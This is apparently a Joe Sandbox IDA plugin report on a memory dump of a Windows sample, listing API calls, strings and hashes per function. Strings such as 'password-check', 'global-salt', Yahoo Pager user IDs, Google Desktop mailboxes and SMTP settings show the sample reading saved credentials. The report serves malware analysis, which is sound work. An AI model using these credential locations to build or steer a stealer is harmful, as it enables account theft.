                                                        • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                        • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                        • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                      • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                      • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                      • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memcmp$memcpy
                                                      • String ID: global-salt$password-check
                                                      • API String ID: 231171946-3927197501
                                                      • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                      • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                      • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                      • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                      APIs
                                                      • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ??3@
                                                      • String ID:
                                                      • API String ID: 613200358-0
                                                      • Opcode ID: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                      • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                      • Opcode Fuzzy Hash: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                      • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                      APIs
                                                      • GetClientRect.USER32(?,?), ref: 004016A3
                                                      • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                      • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                      • BeginPaint.USER32(?,?), ref: 004016D7
                                                      • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                      • EndPaint.USER32(?,?), ref: 004016F3
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                      • String ID:
                                                      • API String ID: 19018683-0
                                                      • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                      • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                      • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                      • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                      APIs
                                                      • memset.MSVCRT ref: 0040644F
                                                      • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                      • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                        • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                        • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                      • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                      • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                      • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                      • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                        • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memcpy$memset
                                                      • String ID:
                                                      • API String ID: 438689982-0
                                                      • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                      • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                      • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                      • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                      APIs
                                                        • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                      • memset.MSVCRT ref: 0040330B
                                                      • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                      • strchr.MSVCRT ref: 0040335A
                                                        • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                      • strlen.MSVCRT ref: 0040339C
                                                        • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                      • String ID: Personalities
                                                      • API String ID: 2103853322-4287407858
                                                      • Opcode ID: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                      • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                      • Opcode Fuzzy Hash: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                      • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                      APIs
                                                      • memset.MSVCRT ref: 00444573
                                                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                        • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenQueryValuememset
                                                      • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                      • API String ID: 1830152886-1703613266
                                                      • Opcode ID: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                      • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                      • Opcode Fuzzy Hash: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                      • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memset
                                                      • String ID: H
                                                      • API String ID: 2221118986-2852464175
                                                      • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                      • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                      • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                      • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memcpy
                                                      • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                      • API String ID: 3510742995-3170954634
                                                      • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                      • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                      • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                      • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memcpy$memset
                                                      • String ID: winWrite1$winWrite2
                                                      • API String ID: 438689982-3457389245
                                                      • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                      • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                      • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                      • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memcpymemset
                                                      • String ID: winRead
                                                      • API String ID: 1297977491-2759563040
                                                      • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                      • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                      • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                      • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                      APIs
                                                      • memset.MSVCRT ref: 0044955B
                                                      • memset.MSVCRT ref: 0044956B
                                                      • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                      • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memcpymemset
                                                      • String ID: gj
                                                      • API String ID: 1297977491-4203073231
                                                      • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                      • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                      • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                      • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                      APIs
                                                      • GetParent.USER32(?), ref: 004090C2
                                                      • GetWindowRect.USER32(?,?), ref: 004090CF
                                                      • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Window$Rect$ClientParentPoints
                                                      • String ID:
                                                      • API String ID: 4247780290-0
                                                      • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                      • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                      • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                      • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                      APIs
                                                      • _strcmpi.MSVCRT ref: 0040E134
                                                      • _strcmpi.MSVCRT ref: 0040E14D
                                                      • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: _strcmpi$_mbscpy
                                                      • String ID: smtp
                                                      • API String ID: 2625860049-60245459
                                                      • Opcode ID: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                                      • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                      • Opcode Fuzzy Hash: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                                      • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                      APIs
                                                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                      • memset.MSVCRT ref: 00408258
                                                        • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                      Strings
                                                      • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Close$EnumOpenmemset
                                                      • String ID: Software\Google\Google Desktop\Mailboxes
                                                      • API String ID: 2255314230-2212045309
                                                      • Opcode ID: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                                      • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                                      • Opcode Fuzzy Hash: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                                      • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                                      APIs
                                                      • memset.MSVCRT ref: 0040C28C
                                                      • SetFocus.USER32(?,?), ref: 0040C314
                                                        • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: FocusMessagePostmemset
                                                      • String ID: S_@$l
                                                      • API String ID: 3436799508-4018740455
                                                      • Opcode ID: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                      • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                      • Opcode Fuzzy Hash: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                      • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: _mbscpy
                                                      • String ID: C^@$X$ini
                                                      • API String ID: 714388716-917056472
                                                      • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                      • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                      • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                      • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                      APIs
                                                        • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                        • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                      • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                      • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                      • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                      • String ID: MS Sans Serif
                                                      • API String ID: 3492281209-168460110
                                                      • Opcode ID: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                      • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                      • Opcode Fuzzy Hash: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                      • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ClassName_strcmpimemset
                                                      • String ID: edit
                                                      • API String ID: 275601554-2167791130
                                                      • Opcode ID: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                      • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                      • Opcode Fuzzy Hash: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                      • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: strlen$_mbscat
                                                      • String ID: 3CD
                                                      • API String ID: 3951308622-1938365332
                                                      • Opcode ID: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                      • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                      • Opcode Fuzzy Hash: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                      • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                      APIs
                                                        • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                      • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                      • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ??2@$memset
                                                      • String ID:
                                                      • API String ID: 1860491036-0
                                                      • Opcode ID: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                                                      • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                      • Opcode Fuzzy Hash: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
